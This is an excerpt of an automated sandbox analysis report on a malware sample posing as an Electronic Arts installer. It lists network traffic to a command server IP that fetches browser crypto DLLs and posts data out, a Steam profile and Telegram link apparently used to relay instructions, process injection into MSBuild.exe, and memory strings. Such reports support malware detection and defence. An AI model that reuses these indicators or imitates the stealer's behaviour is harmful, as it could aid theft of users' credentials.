                        Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Cache-Control: no-cache
                        Source: unknown DNS traffic detected: queries for: steamcommunity.com
                        Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/G
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199673019888
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/badges
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888/inventory/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000E67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888H
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199673019888ve74rMozilla/5.0
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://support.mozilla.org
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp, HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: HIDAFHDH.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfail
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.000000000338D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004381000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/irfailAt
                        Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: DBKKKEHD.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: DBKKKEHD.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/FIDHIEBAKF
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
                        Source: AKKFHDAKECFHIDHJDAAAEBKJEC.1.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2135698617.0000000000EE1000.00000004.00000020.00020000.00000000.sdmp, 76561199673019888[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                        Source: unknown HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknown HTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411D10 memset, GetDesktopWindow, GetWindowRect, GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt, GlobalFix, GlobalSize, SelectObject, DeleteObject, DeleteObject, ReleaseDC, CloseWindow
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADED10 malloc, NtFlushVirtualMemory, memset, memset, memset, memset, memset, memcpy, free, memset, memset, memcpy, memset, memset, memset, memset, memset
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1B8C0 rand_s, NtQueryVirtualMemory
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1B910 rand_s, NtQueryVirtualMemory, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error, GetLastError
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1B700 NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CABF280 NtQueryVirtualMemory, GetProcAddress, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAE60A01_2_6CAE60A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CADC0E01_2_6CADC0E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB250C71_2_6CB250C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFF0701_2_6CAFF070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAF51901_2_6CAF5190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB2B1701_2_6CB2B170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB22A01_2_6CAB22A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFE2F01_2_6CAFE2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CABF3801_2_6CABF380
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB253C81_2_6CB253C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAFD3201_2_6CAFD320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CACC3701_2_6CACC370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAB53401_2_6CAB5340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBECD01_2_6CBBECD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB5ECC01_2_6CB5ECC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC26C001_2_6CC26C00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6AC601_2_6CB6AC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3AC301_2_6CC3AC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB64DB01_2_6CB64DB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCECDC01_2_6CCECDC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF6D901_2_6CBF6D90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8AD501_2_6CC8AD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2ED701_2_6CC2ED70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCE8D201_2_6CCE8D20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC00EC01_2_6CC00EC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBE6E901_2_6CBE6E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6AEC01_2_6CB6AEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFEE701_2_6CBFEE70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC40E201_2_6CC40E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB6EFB01_2_6CB6EFB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC3EFF01_2_6CC3EFF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB60FE01_2_6CB60FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA8FB01_2_6CCA8FB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB66F101_2_6CB66F10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC22F701_2_6CC22F70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA0F201_2_6CCA0F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBCEF401_2_6CBCEF40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC668E01_2_6CC668E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA28801_2_6CBA2880
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC348401_2_6CC34840
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBEA8201_2_6CBEA820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBF09A01_2_6CBF09A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC7C9E01_2_6CC7C9E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB949F01_2_6CB949F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC1A9A01_2_6CC1A9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC209B01_2_6CC209B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBB69001_2_6CBB6900
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB989601_2_6CB98960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDEA801_2_6CBDEA80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC0EA001_2_6CC0EA00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBDCA701_2_6CBDCA70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC18A301_2_6CC18A30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC66BE01_2_6CC66BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC00BA01_2_6CC00BA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC8A4801_2_6CC8A480
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBA64D01_2_6CBA64D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFA4D01_2_6CBFA4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBEA4301_2_6CBEA430
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC44201_2_6CBC4420
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB784601_2_6CB78460
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB545B01_2_6CB545B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC2A5E01_2_6CC2A5E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBEE5F01_2_6CBEE5F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC645401_2_6CC64540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CCA85501_2_6CCA8550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CC005701_2_6CC00570
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBC25601_2_6CBC2560
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBB85401_2_6CBB8540
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBE6E01_2_6CBBE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBFE6E01_2_6CBFE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB846D01_2_6CB846D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CBBC6501_2_6CBBC650
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CB8A7D01_2_6CB8A7D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CCED930 appears 33 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CCEDAE0 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CCE09D0 appears 164 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CB83620 appears 43 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAF94D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CB89B10 appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00402360 appears 286 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 6CAECBE8 appears 134 times
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe | Static PE information: invalid certificate
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000000.1639536772.0000000000DCD000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: hLegalCopyrightCopyright (c) Electronic Arts. All rights reserved.P&OriginalFilenameEAappInstaller.exe0 vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.0000000003515000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclrjit.dllT vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.0000000003515000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFzglflz.dll" vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1758894906.0000000005960000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameFzglflz.dll" vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.00000000043CE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFzglflz.dll" vs SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe
